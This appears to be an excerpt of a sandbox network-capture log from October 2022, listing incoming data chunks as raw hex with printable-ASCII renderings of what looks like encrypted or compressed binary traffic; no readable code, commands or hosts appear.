                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13448INData Raw: 32 8f c4 3f 11 c8 f1 c0 5f 3c 6d ff c6 bf 35 e4 1a 16 c5 25 6b bc d1 14 89 17 33 53 bf f6 55 90 40 f0 d4 a7 b3 b3 d2 39 52 b0 7b 38 0c 37 40 d1 0d db 47 cf a9 ad 16 55 6c ab 17 95 00 ac 0c 84 f9 2b 84 c3 0f c8 80 02 53 de 2b ae 8e 95 2a 0f d1 30 53 39 b0 93 93 40 a6 8a 61 b0 b3 8c f7 94 b3 7b f6 d2 f1 43 d1 c3 6d 81 cc a9 6b 58 93 6f ab 29 f3 c6 af 0c f2 fd d8 fa df 33 e9 d8 cf e1 67 96 fa d0 01 00 00 9a 57 bf 3f e0 3e 92 9c c5 df 6b 34 df c2 1f d8 b2 62 cf 5f bc f3 aa 38 60 75 03 64 3b c0 ab a0 81 32 60 fd c6 d6 c5 3f c3 04 a8 c1 5f 14 71 a6 c7 bf e7 36 4c 3f 00 d8 db 77 c2 df 26 b4 cf 39 20 59 02 8c 3e e0 18 7c 31 33 a0 30 55 f9 c4 9f c7 b5 37 c7 3f a9 86 d2 ce 9f c5 f8 85 39 c0 0d 3c ba 18 c5 56 de be 4b 47 30 79 2b 53 26 33 57 a7 95 32 97 28 19 53 91
                                                                                                                                                                                                                                    Data Ascii: 2?_<m5%k3SU@9R{87@GUl+S+*0S9@a{CmkXo)3gW?>k4b_8`ud;2`?_q6L?w&9 Y>|130U7?9<VKG0y+S&3W2(S
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13464INData Raw: a3 42 8a cb 54 8b aa 58 38 b0 e5 e6 65 50 d8 ba 21 01 12 b8 23 cf 00 17 03 3c 3b f9 d4 5b e4 cf 34 f0 7d ac a5 70 46 99 2d b3 5e 98 f2 e0 4e be 15 94 09 e6 30 81 5e 37 c7 f9 29 f8 7d bb bc db 99 5b 4a c8 7b 95 aa e7 54 79 bf a9 e9 f9 70 01 17 02 64 b5 56 f0 d7 2b 72 cc 47 73 ec fa c1 fb 03 9c 79 c6 7e bf 81 00 90 3e 22 50 d2 84 a6 91 0a 92 1a 50 1b 12 0a da 0d a5 fd c2 97 81 bc 22 ee 3c 81 4d 4f f8 6f c1 dd ae ed 10 62 63 93 ff fa c5 fb d9 7a 80 04 51 7e b1 4c c3 76 b5 01 ef c7 8b 9d 15 b7 13 08 6b 7c 40 bc 72 df 56 76 21 90 03 0d 7b 7f f5 fa 66 62 2c 30 ff f0 cf 72 c8 ce c8 dd 3f c0 1e 7c 58 2e a8 61 43 7e f0 b2 01 6f 6b f7 6f 3e 22 58 e7 c4 23 56 94 3c c2 4e 03 e7 d4 22 4c 8f 9f b1 86 85 a5 62 b5 39 cf 6a f8 54 01 85 6e 5b 3e d0 26 f9 be 00 7f 49 07 90
                                                                                                                                                                                                                                    Data Ascii: BTX8eP!#<;[4}pF-^N0^7)}[J{TypdV+rGsy~>"PP"<MOobczQ~Lvk|@rVv!{fb,0r?|X.aC~oko>"X#V<N"Lb9jTn[>&I
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13480INData Raw: f0 2e 40 01 00 00 00 4e ac 2d 50 74 15 b8 2b 43 2d ce 7a 7b 7c 11 65 6f 9a 59 5f dc bc 5d dc ff d4 df 17 c0 6c 40 07 24 43 23 42 d9 8f 62 8b 70 3f d8 3f bf cd 2b fc 03 49 9d 21 d6 0d fe 2d 70 9f 64 57 6f 6e 16 a8 68 26 6b 94 8b 29 57 8d 4a 3e f4 05 09 9f db 9e ac 97 7d 8a 3c b3 ba fa 40 ff ce 96 73 bf b3 a2 2c 40 01 00 00 00 d9 dd df af e7 df 2c 43 b6 25 d1 20 f2 7c ea 24 77 bf bd 4d 2a 40 fe ff ff ff 00 b6 87 f5 7a f9 83 2a be 30 aa fd 33 07 75 f3 63 9a f0 36 d1 41 7d 99 63 5f 0e a2 a8 9b 24 4a 96 1a 2e c0 fd cf 6b de 7f 48 ff 81 b3 c5 08 bf 2e b8 a3 07 7d d7 cf 35 be 99 28 41 39 d7 97 62 84 08 96 9a 65 d2 55 31 bd c9 a6 80 ee ae d4 6e e4 91 d0 a7 f2 d4 bf 29 a7 6d db 16 76 79 65 9a 94 a7 0c 9e df 4f 59 8f ac cb cd 7f df 57 f1 0d 0f 56 55 43 8f 99 9e ab
                                                                                                                                                                                                                                    Data Ascii: .@N-Pt+C-z{|eoY_]l@$C#Bbp??+I!-pdWonh&k)WJ>}<@s,@,C% |$wM*@z*03uc6A}c_$J.kH.}5(A9beU1n)mvyeOYWVUC
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13496INData Raw: 94 02 cd ea 26 23 a4 49 e5 13 2e 7d 81 f5 4c 62 b6 b4 99 4e 12 d9 e1 71 32 45 e0 4b 72 e3 26 6c 15 7c 0d ec ce a8 38 3b 3a 90 96 15 d9 e2 5d f8 ea 26 ba 23 16 f7 f1 0a 94 ad 0c 02 35 6c 86 42 10 b7 a9 ef 35 ed 16 78 ef 30 06 f8 41 8b 31 03 c1 3f 42 e8 e0 c6 5f 54 bf f5 8c 85 6a db ff 75 3b 76 c4 1b 6c 25 af 82 0b d8 91 e4 07 0e 48 16 5f fc fd 37 6e 74 b2 ef 75 6b 1d c5 12 24 2a 1d c0 f9 1a e3 79 c1 fc fb 15 b0 18 1f 9c 45 a6 4f 0a 6e 17 d9 a0 0b a6 94 8f 0c 51 8f 9c e4 66 96 19 91 eb 66 61 6f e9 eb 66 65 1c 27 05 99 25 8e a5 0f 99 8e 5c 59 f3 66 bd b8 34 08 99 f9 47 ec 00 99 fd c4 ff f8 66 45 cf cc ff 66 55 5c 0c fb 66 34 eb d3 0a 99 7a f5 de 05 99 45 4b a6 05 99 69 50 68 eb 66 19 92 ea e1 66 ba 28 16 1d 99 79 9c 7b e6 66 fd 4c fe 1b 99 a0 2c e4 e5 46 a8
                                                                                                                                                                                                                                    Data Ascii: &#I.}LbNq2EKr&l|8;:]&#5lB5x0A1?B_Tju;vl%H_7ntuk$*yEOnQffaofe'%\Yf4GfEfU\f4zEKiPhff(y{fL,F
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13512INData Raw: 35 cb 3a 7b 71 42 51 aa e2 f9 6e e8 88 bd 16 75 48 50 a8 1a cf 77 ec 0a c8 5c a5 fe 6c 5c 6b 71 dc 1b a7 e1 7b 00 cd 01 47 23 4f c1 e0 c0 5b 9a 96 53 5f 25 c5 0e 48 7a be 7a 1e 3d ee 61 78 ee 73 13 b8 2f d4 6e 3a 7f 6c 38 4b 32 25 0f 69 83 7c c1 ce fd 28 b6 5e dd bb dc da b1 7f 96 c6 8c c6 16 7e 26 25 2e f2 1a ac 4e 24 7d 7e 16 09 de 87 9c a9 4f 49 ef 3c f4 6e 60 e7 d0 0f 94 15 b9 f8 0e c5 34 d4 28 00 98 4a d7 b8 08 72 0c 94 dc 91 ab 45 61 aa 09 cd 22 08 2d c6 c5 0b a9 16 aa 8b 77 0d 02 c7 f2 03 1c d6 57 f9 15 f1 7c cc 51 46 07 9c 22 a8 8e e1 4a 7d 70 c7 36 bb 78 42 cf 29 a6 ec 03 31 2d e6 ae bb 00 68 80 eb d9 8f d0 4f cc 57 53 84 ad a6 33 74 b0 1d 61 37 38 e3 e7 72 16 eb e3 a2 dd 3f 70 79 40 80 4e 51 8a 76 a4 60 3d c0 6a 31 6b b6 7d 92 2b 3b 99 a9 f1 3a
                                                                                                                                                                                                                                    Data Ascii: 5:{qBQnuHPw\l\kq{G#O[S_%Hzz=axs/n:l8K2%i|(^~&%.N$}~OI<n`4(JrEa"-wW|QF"J}p6xB)1-hOWS3ta78r?py@NQv`=j1k}+;:
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13528INData Raw: ed 39 8a ed 00 3e 22 b6 1d a3 96 9d f6 6b a7 3a 5d f2 0c a6 0e c9 76 54 67 1f 61 df 5b 81 16 54 f9 81 9b e1 42 c9 f4 e3 e8 20 aa e2 8e 89 1d 08 83 b7 d7 68 1a 29 9f 2c b8 e2 f5 fe 17 3f 22 10 b6 20 a9 a1 21 3c 93 7b ee 71 72 a3 60 cc 54 cf 65 91 f7 bf 1c 40 52 65 d7 b7 a2 bd 81 a1 38 13 c1 e6 2b 1a 58 87 46 cb 32 4a 86 b7 44 f5 7d 2b d9 62 c1 77 d8 ae 3c 2b 4c c6 9e aa 26 c0 6a 43 92 3f d0 33 ab 75 93 20 c9 a6 7f 53 63 84 69 38 61 20 f1 d8 c0 03 66 78 f4 16 3a e3 45 53 87 05 a8 92 58 6c 87 7c 95 37 36 06 74 64 fb fb fb 5b bf 75 35 ab 91 38 53 be ee f5 9c 70 72 35 a2 63 ed c6 59 03 f7 09 b5 66 ad 07 cd 1b 1b d1 19 83 29 d5 ef 96 0c bc 6d eb 3a 34 55 30 fd 81 60 66 ba 51 16 bd 22 d0 ae 45 3b da 88 5c 2e d3 cf 39 e6 b0 48 fc 24 0f 12 94 16 7d 0e da 1b dc ba
                                                                                                                                                                                                                                    Data Ascii: 9>"k:]vTga[TB h),?" !<{qr`Te@Re8+XF2JD}+bw<+L&jC?3u Sci8a fx:ESXl|76td[u58Spr5cYf)m:4U0`fQ"E;\.9H$}
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13544INData Raw: 7a 63 d2 3a b1 64 ca 34 03 16 66 19 4e 80 0d 4b aa ec 58 15 38 2d f4 35 42 be db a5 db 38 ae 80 30 82 be ba cd f6 f8 a5 5e 20 5a 70 53 aa 2d 83 17 c0 51 90 2a da 21 7c ac eb 3b 09 61 a0 46 59 6e b8 ce 19 9a bc dc 6c 18 06 dd 9d 46 1c c2 a1 98 7e cb b1 06 f9 b4 0d 3c 6f 59 4b 41 7a 2a c1 6c 3c 92 03 26 36 01 c1 87 0a aa bb 1c a3 18 8b 3e c6 42 49 3d 4d 0c f2 45 7b f2 25 49 6a 91 d8 29 84 40 09 1b 4d 8a 5f d6 22 ca 58 92 ff 1b 01 a4 fe b4 cf 6c 18 28 19 94 2c 2d 91 c8 ea 7d f7 f4 5f 82 59 ef 31 41 02 86 0f 1b 9d 36 7c 44 fb 7f 74 f6 e7 2c e0 61 56 4d 3e 85 99 0a c0 56 17 15 8e 68 07 6e 3f 45 52 ba 53 87 97 1c 57 47 ae 0b 41 8f 7d 5d 0c bb 94 fb b1 3d 80 74 42 c7 9e 93 fd 32 1b be 2f 98 90 12 29 00 a1 d4 40 ae 77 ed a9 b8 17 8c 55 bd 50 ab c2 2e d8 82 90 2f
                                                                                                                                                                                                                                    Data Ascii: zc:d4fNKX8-5B80^ ZpS-Q*!|;aFYnlF~<oYKAz*l<&6>BI=ME{%Ij)@M_"Xl(,-}_Y1A6|Dt,aVM>Vhn?ERSWGA}]=tB2/)@wUP./
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13560INData Raw: b3 7c ac f0 c1 3d da b5 ba 51 3a 66 3f 47 57 c8 b9 26 03 99 a1 84 a6 d9 e3 99 46 62 52 48 3e 94 62 ff f2 0a f1 5f 84 22 09 81 3a 55 47 d1 5e b1 20 96 2a 73 45 78 33 ec c9 3b f7 44 33 0b 00 96 7f 67 65 72 70 77 42 38 e7 6f 35 5a c6 3c 57 5f 21 d3 6f dc a5 9d 6a 71 32 16 5b bc 83 d5 79 00 b9 e2 c1 3a 67 2b 28 08 fe c4 22 21 03 47 a9 26 f5 56 d1 f0 e9 7f fd 26 16 dd 74 87 e9 6c 99 d8 39 57 37 74 7f 4c 4c 92 d5 a0 d9 b3 68 6b f9 a4 25 d8 00 a9 0d fa ee 3c 3d c8 b8 ce 85 de e3 10 d9 3d ba 12 26 a8 1f 71 d4 e9 3e d5 f6 b1 cb 33 04 60 24 4e 10 d6 90 36 83 c6 5b 61 b3 25 11 92 24 12 0d 29 22 96 55 35 b5 54 50 bf ab 29 ae 1c 5a 6e 2a 9d b3 26 fe 3e c1 1d 49 60 2e bf b0 91 d7 d7 02 55 dd b9 09 af 77 84 39 3f 93 82 39 41 4d 14 3b 60 f4 6b bf ef d1 29 12 0a c8 a5 a6
                                                                                                                                                                                                                                    Data Ascii: |=Q:f?GW&FbRH>b_":UG^ *sEx3;D3gerpwB8o5Z<W_!ojq2[y:g+("!G&V&tl9W7tLLhk%<==&q>3`$N6[a%$)"U5TP)Zn*&>I`.Uw9?9AM;`k)
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13576INData Raw: a4 84 01 00 00 50 89 bb 77 aa b4 a2 98 c4 00 00 00 f0 56 c7 e7 7b 42 1c b3 1b 84 dc e2 6a d8 1d 27 59 48 6a 0a 2b 61 4f 00 00 00 70 33 13 be f5 c5 62 17 17 84 17 5c 71 41 6a f2 ee 69 7b 01 00 00 60 aa 0f 12 c4 b6 a0 f8 10 c4 34 06 d9 ec 3b a0 2a 86 ef 3b a4 d6 8d 17 c4 79 2f 0a 17 c4 b2 b0 6a 1d c4 6a d4 86 e7 3b ac ee a0 1b c4 29 b7 88 e7 3b 17 3d 5f e1 3b 86 dc 66 e0 3b d2 9c 58 e2 3b 08 9a 79 1e c4 1c a6 26 1d c4 08 8a 2d e5 3b 25 bb aa e5 3b 06 3c ca ef 3b 06 e0 26 15 c4 58 3e ce c6 bf 07 fb e9 86 d3 ae fa fe 2d b0 41 40 b7 ed 9c 81 62 9e d2 f7 79 ce 11 52 e6 7a 58 24 ed 70 61 60 9b d2 11 60 50 df d2 b4 b8 c3 ad ed d8 d6 25 90 52 f5 18 49 1c 92 71 88 7a ae ad 37 a2 76 17 d2 6c 25 cc 5e 12 b8 c5 ee 77 2d 53 4d 42 f8 ad 83 e6 d4 cd 12 4d 2d ec 72 2d 3d
                                                                                                                                                                                                                                    Data Ascii: PwV{Bj'YHj+aOp3b\qAji{`4;*;y/jj;);=_;f;X;y&-;%;<;&X>-A@byRzX$pa``P%RIqz7vl%^w-SMBM-r-=
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13592INData Raw: 77 95 bb 04 9f c5 6e a0 88 e9 d8 03 d0 4f 5d 30 00 c0 c0 63 14 9f 24 27 0b e2 a9 37 de c5 55 ca 07 5f 20 d1 a5 3c f1 1e 87 6c 98 c0 b3 bc 95 aa ae cb 9e d3 e9 9f 04 f3 e6 fa bf 64 25 3a 67 06 aa 58 09 19 93 71 71 92 5d 78 94 66 93 7b 42 54 63 14 ba ae d7 83 ee 79 8e 08 3a b5 08 71 91 6d af c5 91 7f 4d 0b e2 33 13 fb ef 69 50 9f 0c d8 86 7c a8 17 13 21 4c c2 23 c1 58 6f 93 37 0a f2 57 13 d3 88 dc b2 09 bc 3b 08 ab 0c 67 fb cc ff 0f e5 75 a1 ac cf 18 dc 68 5b 8b 8b c9 86 10 a5 63 87 13 e2 5b b4 70 d4 33 65 cb e5 99 68 1d 24 ff 6c 0e 4d bc 29 2e 6e 05 07 de 98 b0 9f 86 b2 3b 23 6b a1 2d 33 cd 59 34 d3 30 64 f3 a6 ad c3 ff 2a 5e e9 e2 3e 50 94 4a c5 e0 69 5f b4 66 82 f4 f1 ff 09 5b 1d 03 12 41 4c 84 75 fb f5 b7 5a 5a 97 54 85 f2 81 d5 31 9d d8 6e 58 5c ad df
                                                                                                                                                                                                                                    Data Ascii: wnO]0c$'7U_ <ld%:gXqq]xf{BTcy:qmM3iP|!L#Xo7W;guh[c[p3eh$lM).n;#k-3Y40d*^>PJi_f[ALuZZT1nX\
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13608INData Raw: 39 84 7b 4a 34 eb 9b ef e2 2f bc 15 38 1e a0 90 9d ad bc b4 a9 f0 43 8a de bb 59 22 fb fe cb 36 12 38 63 ed 83 53 b0 0b 53 1f 1f cc 70 d7 b0 51 17 6e 13 8c bd 6d aa e8 af c5 eb 22 ec 58 e2 fd 39 f6 9e 9d b8 06 35 38 30 9a 6c fd 9a 76 07 ba 39 9c 6b 85 9b 8b 1e 12 dd 46 20 86 63 8f 55 02 f2 4e c4 8c 1b a0 4a d5 71 a0 51 be 6e cb 2a 8a b7 e4 99 63 fd 95 81 36 1e 51 54 57 62 e4 74 70 17 8d 17 f0 84 df 47 52 cc fa 74 b9 a2 d0 23 7d bc 4e 54 8e 5f a1 b7 f4 da 3a 99 c3 2f 88 e2 de aa d9 17 7b 95 63 f6 d7 1d 8a 6b eb 89 ba c4 45 d4 eb 42 71 66 f9 10 a0 e4 20 c1 ae 83 dd 68 3b e4 c8 c3 03 ee 74 c8 f2 d7 b8 d8 4c fd bf 47 c6 f6 a6 a8 34 a5 ec ff 01 dc 3f d0 60 a0 c2 a1 48 cd 49 db 1e 9d ae 0e 48 88 94 21 7b 5a 6f 07 a6 1a 3c a2 c2 19 69 80 8c 08 c6 fc 52 66 05 ad
                                                                                                                                                                                                                                    Data Ascii: 9{J4/8CY"68cSSpQnm"X9580lv9kF cUNJqQn*c6QTWbtpGRt#}NT_:/{ckEBqf h;tLG4?`HIH!{Zo<iRf
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13624INData Raw: 65 3c 0a f2 41 7f 3e 39 51 31 bb da 76 da 26 ce b8 46 f1 90 09 d1 98 80 f6 8f da c3 22 66 7b c9 3c 59 99 85 5a 4a 23 f0 e9 83 03 78 7e 2a 8d 6d c7 65 7b c0 32 f5 b2 0e f5 6c 2f 04 51 22 16 4a a5 55 43 0f 3d 05 9d df a3 34 3e 90 29 18 f8 51 de ab b9 c7 71 ef 0b c5 f2 e8 93 da 9a b0 43 61 b6 05 5e 4e ed 94 18 a1 5a e5 78 39 f8 cf ab 9a 4c 96 bf 18 bd e8 b4 14 6e e9 7a 5c b2 70 e8 eb ca b1 d3 df c5 b0 de fb 45 dd bf 5f e8 70 b1 80 76 e9 0f 6f 90 b8 71 3d fc 3d a2 e9 fe 42 2e d4 f4 df 28 d0 ce c6 19 92 e8 7f 05 e4 ef 08 e6 df 07 ba af 6b 00 46 d1 be f7 1f 3b 24 66 f7 63 ac 46 94 98 88 95 11 e9 a2 ec a3 ab 8c 7e f0 45 3b 9f 89 23 ca 93 40 5d 8d 9b 9b 75 09 f6 b9 06 10 5e 69 fc 3e 48 b7 51 f9 32 65 dc 7d 1f 55 c9 44 a9 a1 15 2a 78 60 e5 b9 92 ee 3f 86 68 cb ca
                                                                                                                                                                                                                                    Data Ascii: e<A>9Q1v&F"f{<YZJ#x~*me{2l/Q"JUC=4>)QqCa^NZx9Lnz\pE_pvoq==B.(kF;$fcF~E;#@]u^i>HQ2e}UD*x`?h
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13640INData Raw: c1 4b 8c 7d 10 12 a8 01 0e bd d8 a9 ef 04 20 65 03 eb 68 60 d3 7c 78 16 04 fe f9 dd 05 93 41 43 a8 9f d7 32 50 2d f6 79 aa a3 79 57 20 9c af 47 1f 84 28 b3 2f 07 96 0d 67 3b c0 bf 7e e1 90 16 ac 34 2e b7 a1 3e c2 93 13 b0 17 f8 9c 61 36 1e 6b e7 ba 78 ab 7d 4e f8 da e2 8c c7 ce d5 e9 64 15 5b cb 36 84 5a b8 64 85 69 0f 76 42 54 11 d1 db 06 91 27 97 8c 12 65 8c f4 a9 35 12 13 4c 49 69 45 3e d3 bd bd 51 b9 be 14 a0 a3 d5 70 0a 06 88 67 ae 03 bd 0f af ed c1 1e 0e 46 49 4b 7f 83 7a 93 bb 64 10 b1 f7 13 f6 ed cd ab 3d 56 e5 37 1f ae 1e 0a 8f c6 1f 9c 37 7f 2e 38 ce c0 10 64 5a 1a 2e 74 70 64 83 a2 db 6b f4 43 2f ab c7 79 ad 38 37 32 20 c7 91 cf 54 51 24 4e e6 8c 0a 46 f8 f3 53 76 48 59 6b c2 0e e0 dd b1 5a 45 03 9e 5c 99 8f 85 ff 27 71 ef f1 94 8a e6 f0 6e 4a
                                                                                                                                                                                                                                    Data Ascii: K} eh`|xAC2P-yyW G(/g;~4.>a6kx}Nd[6ZdivBT'e5LIiE>QpgFIKzd=V77.8dZ.tpdkC/y872 TQ$NFSvHYkZE\'qnJ
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13656INData Raw: 49 df 0f 10 fb 09 ec 2f a1 08 1a 77 4f 75 61 a7 f2 16 d8 96 d6 60 1a dd 0e 45 d5 2a 07 62 39 c2 47 3c 65 5b be 6b 3c 09 68 1e 7b 0d 3d 43 04 37 87 7b ee a0 44 03 86 c1 ba c3 fc 76 51 3f 0c ca 65 5a a2 6b 49 03 b7 89 e0 58 2b e0 ef ad 08 fe a1 2e 69 5d a3 be 38 f9 2d e7 8d 3b d3 b0 ea 29 8f ca 40 c5 27 e0 15 93 83 bd 16 85 03 e0 72 db 50 40 72 f3 66 c6 86 53 6b 01 cf 1f ee c5 49 37 ba 49 1d ec 22 dd 3c 0a fc eb e7 c7 ca 7a 34 b6 69 bd 0d 82 6d b4 3b 9b c5 a4 16 83 91 94 40 02 90 a8 ac c9 0e 0b b6 d5 10 ab c3 6d 8f b1 6c 50 7b 3a be 5d 0d cc 4c 91 52 ba 76 87 fc ef a3 91 7d 92 f4 98 8c cb 1c cb f9 2f 77 67 39 1a 36 10 d1 49 5a 23 bf 3f 2f 7d 76 e7 da 6b 63 e3 3e f3 c9 7c 3b 98 c9 95 8b 31 bd 43 22 58 28 fb df 58 9a b9 0f 3f 6d 81 08 c5 ff 43 55 b8 0b 41 91
                                                                                                                                                                                                                                    Data Ascii: I/wOua`E*b9G<e[k<h{=C7{DvQ?eZkIX+.i]8-;)@'rP@rfSkI7I"<z4im;@mlP{:]LRv}/wg96IZ#?/}vkc>|;1C"X(X?mCUA
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13672INData Raw: f9 59 28 d5 59 e7 f8 20 e5 15 67 69 98 c2 f5 4e 9e 27 9f 2b ec 47 09 b2 3f 80 f6 6b ec 4d 5d 2f 19 63 bf 25 91 aa da 06 d1 90 65 84 e2 50 5e 8a fc 1b f8 5c 0f 76 94 7f f8 f2 1e 45 0c ec aa 9a 03 6c de e1 a4 53 cf f2 08 0e 20 4c 66 04 45 69 20 78 86 16 9e 28 7a 5b ba d1 9d b6 ea ab 99 27 5c 97 fc 1e b2 c8 ea b6 38 4f 5f c6 82 63 6b 16 ee 05 cc ee d3 aa 44 1c 02 13 1e bd 20 df 1a d5 8a 91 01 65 7f 69 d1 6b 6e 2c c2 cb 55 52 0f c1 c7 c2 59 78 8a 95 26 9b 4b 92 c6 02 5a 83 f9 3b 19 4e 52 d9 80 da b0 a0 58 3c 7d d3 b4 7d 73 c0 4d a1 d4 bb 53 3e 23 a9 00 87 4a 43 f3 c4 d5 98 3c 30 3d 92 dc 08 92 66 6f 15 36 b0 4d 46 94 70 c2 8e 15 05 c3 59 32 1d 42 e2 b2 a2 54 19 58 f9 2a f4 11 96 96 a7 7d 1e 49 10 47 c5 50 8e 04 0b ba c1 4e e5 c2 d6 ff d3 fc 2c c2 e3 68 95 c6
                                                                                                                                                                                                                                    Data Ascii: Y(Y giN'+G?kM]/c%eP^\vElS LfEi x(z['\8O_ckD eikn,URYx&KZ;NRX<}}sMS>#JC<0=fo6MFpY2BTX*}IGPN,h
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13688INData Raw: a4 9d 45 42 cf f5 ba d0 3f 84 fc 21 6d 67 b0 82 c7 3f c3 eb ea f5 b6 21 27 fd e5 f6 83 64 b6 e5 f5 2a 7c 07 cb 39 ba 46 a3 bb a7 39 f4 c4 52 15 c1 c3 2d 5c a5 d4 5b 78 ea c6 17 39 ae dc d0 ca 84 29 d9 10 fc b7 7b 00 76 ab 18 a2 c5 aa 5a 8d 28 bf 42 4c 02 63 13 04 86 e0 1b 0c b7 fc 7b e6 f3 58 cc 04 3d e3 56 60 07 1d 3e 10 87 15 ef 11 04 2c 7b be 84 8e c1 c1 c9 7c 92 c7 25 8f 42 42 74 06 53 c4 97 99 62 14 be 0b cd ab 0d a7 41 d6 c4 2b 26 ae 6c 55 2b 79 3f 2c dc f6 b4 17 43 34 09 80 69 b5 fe cd 7c 2a c3 c9 5b f9 1b 1c 2d 3f 2d d8 37 d6 e9 33 21 96 27 95 ab a2 99 c4 fe e9 4f e7 89 e2 f0 5b 32 13 ed 3b 9c ea c8 97 25 ab 74 bd bb 26 0a e4 92 a4 b5 35 de 5f 5b 2a bc a2 a3 c4 7e 93 85 bb 20 4a 85 c4 a8 ca d2 23 d5 bd c7 0c 26 69 46 a4 ec cb 21 e1 09 ed 10 e6 a3
                                                                                                                                                                                                                                    Data Ascii: EB?!mg?!'d*|9F9R-\[x9){vZ(BLc{X=V`>,{|%BBtSbA+&lU+y?,C4i|*[-?-73!'O[2;%t&5_[*~ J#&iF!
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13704INData Raw: 37 67 66 a6 eb 95 30 49 83 9a 3b 34 64 0b 31 54 57 d4 c0 03 ea f9 f6 3a 0a bb 4f 8c 9c ca bb 4e 0d e0 94 d3 a1 2e 51 eb 93 91 f6 df ae 17 4f 00 5e 74 d0 8b 6f 6f ff 6b 20 98 a8 9d 94 26 3e 33 93 f6 29 ef 58 06 c1 04 f5 e5 12 8a ea 5d d5 69 5f 52 51 90 ac f5 08 13 24 56 ba a4 f0 c5 db 24 fc 71 da 66 5d e8 2e e5 d3 46 80 e2 5d 42 17 7c c8 a9 26 42 03 b3 13 56 1a 75 6e 5a 92 e4 1f 58 8b ce 5c d8 68 d6 9e 95 82 4e d6 1e 80 c0 91 bf 0e 78 2a 43 09 25 40 fa 78 a1 5d 39 b1 28 14 5f 98 31 52 fe 56 dc fa 24 84 98 ca fc 87 5b f0 16 77 44 3e f8 bc 02 cd 7b c9 26 73 72 34 82 e4 f4 d3 ab 0c 92 30 62 5e 16 62 41 48 84 b5 ae d6 fe 5c 2c e8 b2 4a b8 ed f4 60 01 1e 4f ea c6 ab 66 69 b5 e3 7e 6b cb 4f ea e6 6a 1b 41 23 28 b4 8c 0a c6 c2 d2 72 cc 84 c6 d9 ef 36 25 6a 26 63
                                                                                                                                                                                                                                    Data Ascii: 7gf0I;4d1TW:ON.QO^took &>3)X]i_RQ$V$qf].F]B|&BVunZX\hNx*C%@x]9(_1RV$[wD>{&sr40b^bAH\,J`Ofi~kOjA#(r6%j&c
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13720INData Raw: 09 c9 14 24 4d 96 b3 90 8c 57 92 9f f7 e5 69 8b d1 73 92 76 9b b5 74 f4 38 c5 5a 01 76 26 6e 75 af 2a b5 47 b9 9b 62 22 7b 61 7b c9 ad 0e d1 52 78 e2 39 fd 27 b7 d0 0d 08 ee 64 6a cb 2d 8a 99 b2 bd 8f 77 b8 68 c3 4a 2c df 4a 04 5a b4 bc 29 94 8b 81 b2 e4 6c 94 13 d0 a3 d9 bf 2e 7e 0a d4 aa e5 08 f5 1a 2c 64 12 e9 b9 62 a9 a6 d9 8c b9 c7 d7 85 43 72 21 b6 b4 36 00 70 27 7d d6 f9 36 f7 3a 31 ef f1 de 06 a7 02 c5 c5 e9 3f 84 9a 38 f8 81 ec 0a 9d 6f 55 2d db cb c9 62 d0 de 09 7c 0b 84 ff c2 3c 63 80 fe 4d a5 a5 ab 3b 2e 27 99 97 a6 0f 55 96 f4 17 fb 00 ef 3e 35 8d a6 d9 75 63 cf bc 0d 63 84 78 12 66 c0 a5 ec 47 2a f2 84 09 94 8a ec 02 f8 81 39 eb bc 6b 03 82 6f 8f bf 23 76 e3 6d 8d ac ff ed 42 a2 0c 2f d0 38 ad ff 00 ba 8c 2f 97 b3 a5 86 0f 75 cd 1c 69 6f ae
                                                                                                                                                                                                                                    Data Ascii: $MWisvt8Zv&nu*Gb"{a{Rx9'dj-whJ,JZ)l.~,dbCr!6p'}6:1?8oU-b|<cM;.'U>5uccxfG*9ko#vmB/8/uio
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC13736INData Raw: 2d cb ea 49 92 66 f5 b4 d5 57 39 d7 dd c4 8e 65 a5 18 cd 3a 06 a4 ad 46 17 8e 8f 2b 3f 91 15 84 64 1e 08 e7 40 12 fb a4 c8 55 62 4d eb d1 10 5c fa d1 ac d8 d1 d9 d6 de 31 eb 8c 72 c1 53 8f 74 6f f6 6d ef 9b 88 25 7b 75 69 13 e0 c2 64 67 d4 dd 87 0b 45 0f e1 f2 1f 06 dc 76 8b 81 22 8a 5e a0 ef 07 3a 95 91 05 17 6c 5a 74 70 0a 48 3f 42 70 d0 7f ed c2 01 98 a3 47 ab 6e ff a8 12 f8 3b b4 43 df 59 b4 32 1f 7a bf 0e 05 ee 40 9a 1a 72 9d fc ca 32 c2 e3 3f ba da f3 45 4c 59 79 61 ef dd 02 e1 ac bd 8b e0 00 d0 f9 ec 94 bf bf f4 d2 4d c8 ba 03 bb f2 0f 98 94 f9 36 c4 60 99 10 30 aa 9a a9 1b a5 c2 9a 53 2c 19 94 34 4d 6d 65 3d d5 33 44 a4 ee 4c 43 12 a3 0c 9b b9 13 71 8a d2 be 92 8a 1f 32 d5 72 17 0f 78 ad f7 de ff 53 6f ee d2 05 7f 41 b2 b1 ac fd f5 ef f3 85 6d 6b
                                                                                                                                                                                                                                    Data Ascii: -IfW9e:F+?d@UbM\1rStom%{uidgEv"^:lZtpH?BpGn;CY2z@r2?ELYyaM6`0S,4Mme=3DLCq2rxSoAmk
